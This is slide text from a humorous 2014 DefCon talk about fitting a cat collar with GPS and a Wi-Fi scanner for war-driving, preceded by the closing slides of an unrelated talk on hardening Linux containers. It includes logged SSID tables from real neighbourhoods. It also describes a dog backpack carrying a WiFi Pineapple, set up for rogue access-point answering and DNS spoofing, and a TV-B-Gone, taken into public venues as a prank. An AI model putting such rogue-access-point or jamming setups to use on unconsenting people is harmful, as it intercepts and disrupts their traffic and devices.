kernel with grsecurity+pax Syscall Filtering w/ seccomp-bpf Minimal container distro Mount protections User namespace w/o caps Hardened application Trust B Trust C Trust D 2015 NCC Group 130 Where do we go from here? More namespaces (proc, dev) Minimal hypervisors (ClearContainers) Minimal container distros Android or other non-x86 that needs app/system segmentation/sandboxing 2015 NCC Group 131 Where do we go from here? “Desktop” applications in containers Improved seccomp-bpf argument filtering Hopefully more granular capabilities ….. more vulnerabilities too! :/ 2015 NCC Group 132 Where do we go from here? Microservices 2015 NCC Group 133 Where do we go from here? 2015 NCC Group 134 Where do we go from here? 2015 NCC Group 135 Where do we go from here? 2015 NCC Group 136 Conclusion It’s not about perfect security but improving the current state and making attackers work harder The technologies to support containers can be used to help secure existing non-container Linux systems Microservices architecture fits a least-privilege and least-access container/security model Physically separate critical security barriers and isolate by trust 2015 NCC Group 137 In closing My whitepaper: “Understanding and Hardening Linux Containers”… Covers everything here in muuuch more depth! (background, namespaces, all the capabilities, cgroups, explores MAC, seccomp-bpf, past container attacks, overall and specific weaknesses, security recommendations for LXC, Docker, rkt deployments) 2015 NCC Group 138 Coming soon! When will the whitepaper be released ? Hopefully in the next few weeks! How can I make sure I get it? Email me! or follow me on Twitter! @dyn___ (totally not a ploy for more followers) 2015 NCC Group 139 Coming soon! Any Questions/Comments? Aaron.Grattafiori@nccgroup.trust https://twitter.com/@dyn___ 2015 NCC Group 140 Thanks!
© 2013 tenacitysolutions.com 1835 Alexander Bell Drive, Suite 100, Reston, VA 20191 703-673-3100 Weaponizing your Pets! The War Kitteh and the Denial of Service Dog! DefCon! 10 August 2014! ! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Introductions! •  Gene Bransfield @gbransfield! •  Principle Security Engineer @ Tenacity! •  I Love My Job! •  They want my job! •  They can’t have it! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 What is This About?! •  Having a humorous idea! •  Bringing Ideas to Fruition! •  Stories of Triumph and Woe! •  Valuable Lessons Learned! ! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Weaponize your PETS!?!?! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Background:! •  15% of the world’s Internet traffic is dedicated to Cats! •  I find most tech briefings boring, so I use pics of cats to help keep people awake! ! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 The pic that started it all:! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Just Finished a Presentation… "! •  Someone told me they were going to give me this tracking collar that they won! – GPS! – Cellular! – Told you where the Kitteh was at all times! •  …add a little wifi sniffer and we’d have a WAR KITTEH!!!! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 What about the DoS Dog?! •  AT Outerz0ne! •  LadyMerlin walked in with a dog wearing a harness that said Denial of Service Dog! •  I said “Is there a Pineapple in there?”! – No, the dog is a pain, but that’s a geat idea!! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Working Animals! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Bad Ass Working Animals! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Badder Ass Working Animals! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Real Navy Seal! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Flipper Pic! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Other Research Efforts! •  Accoustic Kitty! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 MY STUFF -- Requirements! •  War Kitteh Requirements:! •  CONOP: Put a collar/harness on a cat and allow said feline to roam the neighborhood normally. The collar/ harness shall contain a GPS tracking device and a wireless sniffer/scanner. We'll be looking to map WiFi Access points similar to war driving. ! –  0.) CAT SHALL NOT BE HARMED! –  1.) Cat shall be able to comfortably wear stuff and should not be harmed by said stuff or by wearing said stuff! –  2.) GPS shall record waypoints with associated date/time stamp for collection post-walkabout (e.g. when the cat returns).! •  a.) optionally, solution to provide on-demand locational data as well so we can find a lost kitteh or kitteh harness! –  3.) WiFi sniffer scanner shall sync time with GPS device and collect wifi SSIDs and other WiFi-related signals for later Analysis! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Other Products! •  Mr Lee Cat Cam! – http://www.mr-lee-catcam.de! •  Pet Tracker ! – http://www.pettracker.com! •  Garmin! – https://buy.garmin.com/! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 GumStix! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Cotton Candy! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 RockChip 3066! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Thinking about it…! •  Small form factor! •  GPS! •  Wifi! •  Cellular! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 How ‘bout a Cell Phone?! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Now make an APK!?!?! •  Need to code a wifi war driving! •  Let’s do some android coding…?! •  They already thought of that…! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 WiGLE WiFi! ! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Volunteer Cat! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Cat Coat?! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 “Cat” Coat! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Plan:! •  Put Tech in Coat! ! •  Put Coat on Cat! •  Send cat on walkabout! •  Recover data when cat returns! •  Profit! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Step 1! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Step 2! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Step 2 cont! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Step 3! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Step… 4?! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 …yeah…! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Trying this again….! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Ummm….! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 FAIL! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Last Known GPS…?! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Lessons Learned! •  Cats are damn hard to work with! •  Always test before you send out ‘spensive stuff! •  Amazon Prime account! •  Worried about cat, so no more coat! •  Smaller form factor with same capability! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Talked to my Friend Bill…! •  Hobbiest & Technologist! •  What about Arduino! – Small form factor! – Low power consumption! – Does what you need it to do and no more! – Many chips, variety of solutions! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 What is Arduino?! •  Arduino is an open-source electronics platform based on easy-to-use hardware and software. It's intended for anyone making interactive projects.! •  Lots of expansion boards of “Shields”! •  Make robots, remote control cars, home security products, etc.! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Freezer check! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Robotic Hand! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Video Games! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Small Form Factor…! •  Arduino Mini…! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Good News… Bad News…! •  Good News!! – Open Source! – Inexpensive! •  Bad News!! – Poorly Documented! – Takes forever to get to you! – Questionable performance…! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Well I Never… ! •  Done Anything with Arduino! •  Worked with firmware/small chip sets! •  Not a professional coder…! •  Soldered ! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Don’t Worry! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Plan…! 1.) Learn about Arduino! " "-- Get some basic stuff! ! 2.) Decide on most accommodating form factor for WarKitteh! ! 3.) Put it all together in a collar FTW! ! 4.) Do some stuff with DoS Dog…! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Learning Arduino…! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Basic Stuff…! •  Arduino Uno! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Flashy Things…! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Cooler Stuff!! •  I need software libraries for WiFi ! – They got it!! •  I need software libraries for GPS! – They got it!! •  I need software libraries for SD card stuff! – They got it!! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Shout Out…! •  Jeremy Blum Videos! – Jeremyblum.com! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 I r a Expert!! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 So I got…! •  Arduino WiFi Shield! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 And Finally…! •  Itead Studio GPS Shield! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 The plan…! •  Get a WiFi collection function! – Write to SD Card! •  Get a GPS tracker! – Write to SD card! •  Combine! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 WiFi Shield! •  Set up was easy! •  Drivers worked! •  Messing around with parameters and variables and! •  VICTORY!!! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 EASY!!!! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 A bit about GPS! •  NMEA string! –  National Maratime Electronics Association! $GPGGA,123519,4807.038,N,01131.000,E,1,08,0.9,545.4,M,46.9,M,,*47! ! •  Boot process! –  Start up! •  Where am I…?! –  Listen to SPACE! –  Get a lock (at least 3 satellites)! •  2-15 minutes!!! (depending on conditions)! ! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 GPS Shield! •  Poorly Documented! •  No docs in kit! •  Searched forever to find baudrate of 34800! •  Now I can’t NOT find it! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Put all the components together! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 So weird error…! •  Something about 80% of memory utilized…! •  Libraries and variables were too much…! •  Arduino Uno – 32K! •  Arduino Mega2560 – 256K! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Purchased the Mega…! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Put THAT all together! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 It WORKS!!! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Arduino Mega2560! •  Mo Memory! – Mo betta! •  Mo Ports! – Mo betta! •  Mo Size! – Not Mo betta! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Tiny Arduino2560?! •  Arduino MegaMini from JK Devices! •  DON’T DO IT!!!!! more later…! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Small Form Factor! •  Adafruit Wifi…! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Spark Core! •  Spark.io! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 GPS chip! •  GP-635T! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Micro SD Card! •  SparkFun MicroSD Breakout Board! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 So it works, but…! •  MegaMini says it’s going to be 4 weeks to ship at least…! •  Other solutions are too big (size) or too small (memory)! •  Spark.io Spark Core! – Shipping problem, had to borrow one! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Real Tech on Spark! √! √! √ ! √! X! •  ARM 32-bit M3 CPU ! •  128KB Memory (wooHOO!!!) ! •  SPI and I2C compliant ! •  TI CC3000 WiFi chip ! •  “Arduino Compatible” ! – Worked with external components! – Coding wouldn’t work! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 OMG! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Start-up Product! •  Starting everything from scratch! –  Didn’t have libraries for the stuff I needed! •  To spite that, VERY COOL! •  Dedicated core group of developers! –  Shout out to peekay123! •  Lets see what happens…! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Libraries! •  Someone Posted SD Card Libraries to the forums! – They Compiled! ! •  Someone posted GPS libraries to the forums…! – They Compiled & Worked with GPS Shield!! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 WiFi Libraries! •  …no readily available stuff for what I wanted to do! •  Spark is an “Internet of Things” device! •  WiFi as a service – not to mess with! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Adafruit FTW!! •  Adafruit CC3000 Breakout board! •  Libraries available on the Adafruit website for Download! •  Messed with it earlier… let’s see if it works! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 It WORKS!!! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 So now…! •  Got GPS working on Spark! •  Got SD compiled on Spark! •  Got SSID collection working on Spark! •  Now to work with tiny components! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Now, onto soldering! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Rule 1! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Rule 2! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Rule 3! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 First attempts went very well…! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Testing…! •  At home everything went Great!! •  Took it out for a walk around the yard and it was great!! •  Took it for a ride in the car and FAIL!!! •  What happened…?! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Spark Concept! •  Internet of Things device! •  Never meant to be disconnected from the Internet! •  Encased in a “If status == WIFI_ON” clause! – Must be connected to a known WAP to return true! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 What to do "! •  Noticed that I could scan SSID’s before I associated with the AP! •  Removed code from clause! •  That’s all I need anyway! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 More testing…! •  Took it for a drive! •  Got Data back!!!!! •  Looked at the GPS cords… they were off by about half a mile…! •  GPS Libraries were wrong! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 TinyGPS++! •  LOVE to use TinyGPS++! – Everything I need! – Didn’t work in Spark! •  How to Port Libraries? Talk to Bill! •  Rocket Science! – Replace Arduino with Spark and fix what blows up! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 It WORKS!!! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Next Problem! •  Power Consumption! – How to do it best…?! •  Eflite 3.7v 500mAh batteries! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Testing for Power Consumption! •  Originally tried cycling everything on and off! –  That really didn’t work well! •  Put main chip in Deep sleep to save juice! –  Keep GPS chip on! •  Collections every 30 sec lasted 4 hours! •  Collections every 10 minutes lasted 8 hours! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Time to Make Collar! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Form Factor! •  DeSoldering is TWICE as much fun as soldering! – NOT! •  Internet again NOT helpful! •  YouTube makes it look TOO easy! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 NOVALabs Shout Out! •  Reston, VA! •  Ted! –  Mad Scientist/Evil Genius! –  Helped me learn EAGLE! •  Brian! –  Soldering Tutor! –  Right Iron, Right Solder! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Now… where my Maker’s at?! •  Need to make a cat collar…! •  How do I make a cat collar???! – Lots of Ways! •  Friend Joe suggested ribbons! – Sew them together! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Ribbon! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Get a Grandma! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Collar Assembly! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Volunteer Cat! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 So let’s PRACTICE first..! •  Let cat out with no-tech collar and see if he tolerated it…! •  HE DID!! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Old Way…! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 New Collar! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Weight…! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 So… New plan! •  Tech goes in the Collar! •  Collar goes on the cat…! •  Cat goes on a walk about…! •  Profit! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Initial results! •  …Nothing….!?!?!?!?! •  Put collar on cat! •  Cat walked under a bush! •  Hung out and licked himself for 20 minutes! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 New Deployment procedures! •  Let collar sit outside for 5-10 min! •  Bring cat to collar, put it on cat! •  Let cat go for a walk about…! •  …profit…!?!?!?????! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 SUCCESS!!!!! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Results! Date% Time% Lat% Lon% SSID% Signal% Encrypt% 7/4/2014' 11:46:31' 39.09994'-76.******' walker2' -87'WPA2' 7/4/2014' 11:46:31' 39.09994'-76.******' UDRK2' -92'WEP' 7/4/2014' 11:46:31' 39.09994'-76.******' walker' -83'WPA' 7/4/2014' 11:46:31' 39.09994'-76.******' KNPI1' -95'WEP' 7/4/2014' 11:46:31' 39.09994'-76.******' HOME-BAC6' -93'WPA2' 7/4/2014' 11:46:31' 39.09994'-76.******' 8NBN8' -93'WPA2' 7/4/2014' 11:46:31' 39.09994'-76.******' sportsfans' -96'WPA2' 7/4/2014' 11:46:31' 39.09994'-76.******' 6RZDB' -95'WPA2' 7/4/2014' 11:51:38' 39.09986'-76.******' walker2' -88'WPA2' 7/4/2014' 11:51:38' 39.09986'-76.******' 8NBN8' -98'WPA2' 7/4/2014' 11:51:38' 39.09986'-76.******' KNPI1' -95'WEP' 7/4/2014' 11:51:38' 39.09986'-76.******' sportsfans' -96'WPA2' 7/4/2014' 11:51:38' 39.09986'-76.******' HOME-BAC6' -94'WPA2' 7/4/2014' 11:51:38' 39.09986'-76.******' walker' -83'WPA' 7/4/2014' 11:51:38' 39.09986'-76.******' NOTyourWiFi' -94'WPA2' 7/4/2014' 11:56:46' 39.09987'-76.******' walker2' -90'WPA2' 7/4/2014' 11:56:46' 39.09987'-76.******' VCET0' -98'WEP' 7/4/2014' 11:56:46' 39.09987'-76.******' UDRK2' -98'WEP' 7/4/2014' 11:56:46' 39.09987'-76.******' 8NBN8' -96'WPA2' 7/4/2014' 11:56:46' 39.09987'-76.******' walker' -81'WPA' 7/4/2014' 11:56:46' 39.09987'-76.******' P41R1' -95'WEP' 7/4/2014' 11:56:46' 39.09987'-76.******' KNPI1' -94'WEP' 7/4/2014' 11:56:46' 39.09987'-76.******' HOME-BAC6' -92'WPA2' 7/4/2014' 11:56:46' 39.09987'-76.******' NOTyourWiFi' -96'WPA2' 7/4/2014' 11:56:46' 39.09987'-76.******' 6RZDB' -94'WPA2' © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Video! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Coco! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Results! Date% Time% Lat% Lon% SSID% Signal% Encrypt% 7/19/2014' 16:59:07' 38.94373'-77.******' 6WWV8' -94'WPA2' 7/19/2014' 16:59:07' 38.94373'-77.******' CROWLEY' -93'WEP' 7/19/2014' 16:59:07' 38.94373'-77.******' DIRECT-roku-09C2C5' -88'WPA2' 7/19/2014' 16:59:07' 38.94373'-77.******' xfinitywifi' -82'OPEN' 7/19/2014' 16:59:07' 38.94373'-77.******' CoxWiFi' -80'OPEN' 7/19/2014' 16:59:07' 38.94373'-77.******' CableWiFi' -80'OPEN' 7/19/2014' 17:04:16' 38.94365'-77.******' Apple'Network'6b7973' -89'WPA2' 7/19/2014' 17:04:16' 38.94365'-77.******' 6WWV8' -92'WPA2' 7/19/2014' 17:04:16' 38.94365'-77.******' CQXPP' -76'WPA2' 7/19/2014' 17:04:16' 38.94365'-77.******' P6829' -96'WPA2' 7/19/2014' 17:09:25' 38.94386'-77.******' NETGEAR' -94'WPA2' 7/19/2014' 17:09:25' 38.94386'-77.******' DIRECT-roku-409' -93'WPA2' 7/19/2014' 17:14:34' 38.9435'-77.******' 7LXJ3' -83'WEP' 7/19/2014' 17:14:34' 38.9435'-77.******' peri' -93'WPA' 7/19/2014' 17:14:34' 38.9435'-77.******' Ward3DC' -88'WPA2' 7/19/2014' 17:14:34' 38.9435'-77.******' MYI14' -96'WEP' 7/19/2014' 17:19:43' 38.94323'-77.******' 7LXJ3' -94'WEP' 7/19/2014' 17:19:43' 38.94323'-77.******' LuckyWhale_2GEXT' -93'WPA2' 7/19/2014' 17:24:52' 38.94373'-77.******' LKMY4' -96'WPA2' 7/19/2014' 17:24:52' 38.94373'-77.******' MYI14' -94'WEP' 7/19/2014' 17:40:19' 38.94316'-77.******' LuckyWhale_2GEXT' -92'WPA2' 7/19/2014' 17:40:19' 38.94316'-77.******' Motyka'Wireless' -88'WPA' 7/19/2014' 17:40:19' 38.94316'-77.******' Ward3DC' -90'WPA2' 7/19/2014' 17:40:19' 38.94316'-77.******' SXJ32' -94'WPA2' 7/19/2014' 17:40:19' 38.94316'-77.******' Q8ZS7' -96'WEP' © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Video! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 That’s the WarKitteh! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Denial of Service Dog! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 DoS Dog! •  So…. More trolling than anything! •  WiFi Pineapple! –  Procured at ShmooCon! •  TV B Gone! –  Adafruit/RadioShack! •  Doggie Backpack with “Denial of Service Dog” patches! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 WiFi Pineapple! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 What I’m gonna do is…! •  Karma! – Answers Probes! •  DNS Spoof! – Redirects all things to Pineapple! •  randomroll…! – ‘cause RickRoll makes trolling better! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 TV B Gone …in pieces.! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 TV B Gone! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Some minor modifications…! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Patches! •  WHOLLY Crap! What a pain in the butt!! •  Nobody does it anymore! •  ‘Cept Irina & Friends at JoAnn’s Fabrics in Sterling, VA! – Thank Jesus! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Victory!! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Demo Video! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Demo Video! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Volunteer Dog! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Volunteer Dog! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Volunteer Dog! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Volunteer Dog Ready to Go! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Putting it on a Doggie Backpack! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Top View! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 LEDs…! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Dog will Shake! •  TV B Gone wasn’t designed to be shaken in the manner in which V-dog was shaking..! •  Also set off the TV-B-Gone! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Restaruant! Denial'Of' Service'Dog' menu' Do'you'mind'if'' We'come'in?' Sure!''Want'' Something'to'drink?' Peanut'bufah' jelly'hme!!!' Why'does'it'say'' Denial'of'Service'' ''''''''''''''dog?' Love!?' Play!?' ' © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Sports Bar! Denial'Of' Service'Dog' GOAL!!!!' Never'gonna'' give'you'up…' BALL! !!!' QUE?!' © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Box Store! Denial'Of' Service'Dog' Best' STORE' Do'you'mind'if'' We'come'in?' Sure!'Make'sure'he' Doesn’t'poop'on'anything' 